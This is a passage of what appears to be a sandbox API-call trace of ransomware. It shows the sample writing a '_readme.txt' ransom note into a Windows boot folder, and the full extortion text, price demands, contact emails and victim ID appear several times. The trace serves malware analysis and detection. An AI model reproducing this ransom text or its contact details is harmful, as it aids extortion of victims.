(HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.774] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.774] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.774] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.775] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.775] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.775] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.775] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.775] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.775] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.775] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.775] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.775] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.775] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.775] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.775] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.775] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.775] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.775] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.775] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.775] PathFindFileNameW (pszPath="C:\\Boot\\hu-HU\\") returned="hu-HU\\" [0142.775] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0142.775] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.775] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0142.775] PathFindFileNameW (pszPath="") returned="" [0142.775] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0142.776] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0142.776] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3221ae8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0142.776] FreeLibrary (hLibModule=0x759d0000) returned 1 [0142.776] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.776] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.776] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.776] PathAppendW (in: pszPath="C:\\Boot\\hu-HU\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\hu-HU\\_readme.txt") returned 1 [0142.776] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.776] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.776] PathFileExistsW (pszPath="C:\\Boot\\hu-HU\\_readme.txt") returned 0 [0142.777] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x9ad6f98 [0142.777] lstrcpyW (in: lpString1=0x9ad6f98, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d" [0142.777] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d", lpString2="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR" [0142.777] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9ab03c8 [0142.777] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\_readme.txt" (normalized: "c:\\boot\\hu-hu\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6f0 [0142.777] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8c0) returned 0x3221ae8 [0142.777] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x85b) returned 0x325d510 [0142.777] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR", cchWideChar=-1, lpMultiByteStr=0x325d510, cbMultiByte=2139, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR", lpUsedDefaultChar=0x0) returned 1116 [0142.777] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x321dfc8 [0142.777] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.777] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.778] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR") returned 1115 [0142.778] WriteFile (in: hFile=0x6f0, lpBuffer=0x321dfc8*, nNumberOfBytesToWrite=0x45b, lpNumberOfBytesWritten=0x9dbfb64, lpOverlapped=0x0 | out: lpBuffer=0x321dfc8*, lpNumberOfBytesWritten=0x9dbfb64*=0x45b, lpOverlapped=0x0) returned 1 [0142.778] CloseHandle (hObject=0x6f0) returned 1 [0142.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321dfc8 | out: hHeap=0x620000) returned 1 [0142.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ab03c8 | out: hHeap=0x620000) returned 1 [0142.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ad6f98 | out: hHeap=0x620000) returned 1 [0142.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.779] FindFirstFileW (in: lpFileName="C:\\Boot\\hu-HU\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc8b4d0f0, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8b4d0f0, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3275b30 [0142.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.779] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc8b4d0f0, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8b4d0f0, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0142.779] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0142.779] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8b4d0f0, ftCreationTime.dwHighDateTime=0x1d62438, ftLastAccessTime.dwLowDateTime=0xc8b4d0f0, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8b4d0f0, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x45b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0142.779] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8b4d0f0, ftCreationTime.dwHighDateTime=0x1d62438, ftLastAccessTime.dwLowDateTime=0xc8b4d0f0, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8b4d0f0, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x45b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0142.779] FindClose (in: hFindFile=0x3275b30 | out: hFindFile=0x3275b30) returned 1 [0142.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1730 | out: hHeap=0x620000) returned 1 [0142.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1730 [0142.780] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0142.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x325d510 [0142.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: 